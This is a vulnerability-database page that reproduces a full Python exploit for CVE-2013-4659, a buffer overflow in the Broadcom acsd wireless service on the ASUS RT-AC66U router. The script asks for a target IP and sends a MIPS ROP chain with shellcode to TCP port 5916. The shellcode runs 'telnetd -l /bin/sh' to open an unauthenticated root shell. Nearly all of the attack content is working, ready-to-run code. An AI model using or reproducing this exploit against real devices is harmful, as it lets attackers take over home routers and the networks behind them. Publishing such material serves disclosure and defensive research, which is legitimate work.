Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

ASUS RT-AC66U acsd Param - Remote Root Shell Exploit

🗓️ 27 Jul 2013 00:00:00Reported by Jacob HolcombType 
zdt
 zdt🔗 0day.today👁 46 Views

ASUS RT-AC66U Remote Root Shell Exploit - acsd param command. Vulnerabilities in Broadcom ACSD Wireless Service

Related
Code
ReporterTitlePublishedViews
Family
BDU FSTEC		The vulnerability of the Broadcom ACSD component (used on routers) involves buffer overflows, allowing attackers to execute arbitrary code.
7 Dec 201700:00
bdu_fstec
CVE		CVE-2013-4659
14 Mar 201709:02
cve
Cvelist		CVE-2013-4659
14 Mar 201709:02
cvelist
Exploit DB		MIPS Little Endian Shellcode
27 Jul 201300:00
exploitdb
Exploit DB		ASUS RT-AC66U - 'acsd' Remote Command Execution
27 Jul 201300:00
exploitdb
exploitpack		ASUS-RT-AC66U-acsd-Param
4 Jan 201517:33
exploitpack
exploitpack		ASUS RT-AC66U - acsd Remote Command Execution
27 Jul 201300:00
exploitpack
NVD		CVE-2013-4659
14 Mar 201709:59
nvd
Packet Storm		ASUS RT-AC66U ACSD Remote Root Buffer Overflow
26 Jul 201300:00
packetstorm
Prion		Buffer overflow
14 Mar 201709:59
prion
Rows per page
#!/usr/bin/env python
 
import signal, struct
from time import sleep
from socket import *
from sys import exit, exc_info
 
#
# Title*******************ASUS RT-AC66U Remote Root Shell Exploit - acsd param command
# Discovered and Reported*June 2013
# Discovered/Exploited By*Jacob Holcomb/Gimppy and Jacob Thompson
#                        *Security Analsyts @ Independent Security Evaluators
# Software Vendor*********http://asus.com
# Exploit/Advisory********http://securityevaluators.com, http://infosec42.blogspot.com/
# Software****************acsd wireless service (Listens on TCP/5916)
# Firmware Version********3.0.0.4.266 (Other versions were not tested and may be vulnerable)
# CVE*********************ASUS RT-AC66U Multiple Buffer Overflows: CVE-2013-4659
#
# Overview:
#   The ASUS RT-AC66U contains the Broadcom ACSD Wireless binary that is vulnerable to multiple
#   Buffer Overflow attacks.
#
#   Multiple overflows exist in the following software:
#
#   - Broadcom acsd - Wireless Channel Service (autochannel&param, autochannel&data, csscan&ifname commands)
#                                                      
 
 
def sigHandle(signum, frm): # Signal handler
     
    print "\n[!!!] Cleaning up the exploit... [!!!]\n"
    sleep(1)
    exit(0)
 
 
def targServer():
     
    while True:   
        try:
            server = inet_aton(raw_input("\n[*] Please enter the IPv4 address of the ASUS RT-AC66U router:\n\n>"))
            server = inet_ntoa(server)
            break
        except:
            print "\n\n[!!!] Error: Please enter a valid IPv4 address. [!!!]\n\n"
            sleep(1)
            continue
             
    return server  
 
 
def main():
       
    print ("""\n [*] Title: ASUS RT-AC66U Remote Root Shell Exploit - acsd param command
 [*] Discovered and Reported: June 2013
 [*] Discovered/Exploited By: Jacob Holcomb/Gimppy and Jacob Thompson, Security Analysts @ ISE
 [*] Software Vendor: http://asus.com
 [*] Exploit/Advisory: http://securityevaluators.com, http://infosec42.blogspot.com/
 [*] Software: acsd wireless service (Listens on TCP/5916)
 [*] Firmware Version: 3.0.0.4.266 (Other versions were not tested and may be vulnerable)
 [*] CVE: ASUS RT-AC66U Broadcom ACSD Buffer Overflow: CVE-2013-4659\n""")
    signal.signal(signal.SIGINT, sigHandle) #Setting signal handler for ctrl + c
    victim = targServer()
    port = int(5916)
    acsdCmd = "autochannel&param=" #Vulnerable command - JH
     
    # base address of .text section of libc.so.0 in acsd's address space
    libc_base = 0x2ab25000
 
    # ROP gadget #1
    # lui     s0,0x2
    # li      a0,1
    # move    t9,s1
    # jalr    t9
    # ori     a1,s0,0x2
    ra1 = struct.pack("<L", libc_base + 0x2d39c)
 
    # ROP gadget #2
    # move    t9,s3
    # lw      ra,44(sp)
    # lw      s4,40(sp)
    # lw      s3,36(sp)
    # lw      s2,32(sp)
    # lw      s1,28(sp)
    # lw      s0,24(sp)
    # jr      t9
    s1 = struct.pack("<L", libc_base + 0x34358)
 
    # sleep() - used to force program context switch (cache flush)
    s3 = struct.pack("<L", libc_base + 0x2cb90)
 
    # ROP gadget #3
    # addiu   a1,sp,24
    # lw      gp,16(sp)
    # lw      ra,32(sp)
    # jr      ra
    # addiu   sp,sp,40
    ra2 = struct.pack("<L", libc_base + 0xa1b0)
 
    # ROP gadget #4
    # move    t9,a1
    # addiu   a0,a0,56
    # jr      t9
    # move    a1,a2
    ra3 = struct.pack("<L", libc_base + 0x3167c)
 
    # jalr sp
    jalr_sp =  "\x09\xf8\xa0\x03"
     
    JuNk = "\x42" * 510
    safeNop = "2Aa3"
 
    #80 Bytes system() Shellcode by Jacob Holcomb of ISE
    #Calling system() and executing telnetd -l /bin/sh
    shellcode = "\x6c\x6e\x08\x3c\x74\x65\x08\x35\xec\xff\xa8"
    shellcode += "\xaf\x64\x20\x09\x3c\x65\x74\x29\x35\xf0\xff"
    shellcode += "\xa9\xaf\x20\x2f\x0a\x3c\x2d\x6c\x4a\x35\xf4"
    shellcode += "\xff\xaa\xaf\x6e\x2f\x0b\x3c\x62\x69\x6b\x35"
    shellcode += "\xf8\xff\xab\xaf\x73\x68\x0c\x24\xfc\xff\xac"
    shellcode += "\xaf\xec\xff\xa4\x23\xec\xff\xbd\x23\xb4\x2a"
    shellcode += "\x19\x3c\x50\xf0\x39\x37\x09\xf8\x20\x03\x32"
    shellcode += "\x41\x61\x33"
 
    sploit = acsdCmd + JuNk + s1 + JuNk[0:4] + s3 + ra1 + JuNk[0:48]
    sploit += ra2 + JuNk[0:24]+ jalr_sp + safeNop + ra3 + JuNk[0:4]
    sploit += safeNop + shellcode
 
    try:
        print "\n [*] Creating network socket."
        net_sock = socket(AF_INET, SOCK_STREAM)
    except:
        print "\n [!!!] There was an error creating the network socket. [!!!]\n\n%s\n" % exc_info()      
        sleep(1)
        exit(0)   
 
    try:
        print " [*] Connecting to ASUS RT-AC66U router @ %s on port TCP/%d." % (victim, port)
        net_sock.connect((victim, port))
    except:
        print "\n [!!!] There was an error connecting to %s. [!!!]\n\n%s\n" % (victim, exc_info())
        sleep(1)
        exit(0)
  
    try:
        print """ [*] Attempting to exploit the acsd param command.
 [*] Sending 1337 ro0t Sh3ll exploit to %s on TCP port %d.
 [*] Payload Length: %d bytes.""" % (victim, port, len(sploit))
        net_sock.send(sploit)
        sleep(1)
    except:
        print "\n [!!!] There was an error sending the 1337 ro0t Sh3ll exploit to %s [!!!]\n\n%s\n" % (victim, exc_info())
        sleep(1)
        exit(0)
 
    try:
        print """ [*] 1337 ro0t Sh3ll exploit was sent! Fingers crossed for code execution!
 [*] Closing network socket. Press ctrl + c repeatedly to force exploit cleanup.\n"""
        net_sock.close()
    except:
        print "\n [!!!] There was an error closing the network socket. [!!!]\n\n%s\n" % exc_info()
        sleep(1)
        exit(0)
 
 
if __name__ == "__main__":
    main()

#  0day.today [2018-01-04]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
27 Jul 2013 00:00Current
9.2High risk
Vulners AI Score9.2
EPSS0.11534
asus rt-ac66uremote root shellbroadcom acsdbuffer overflowwireless service
46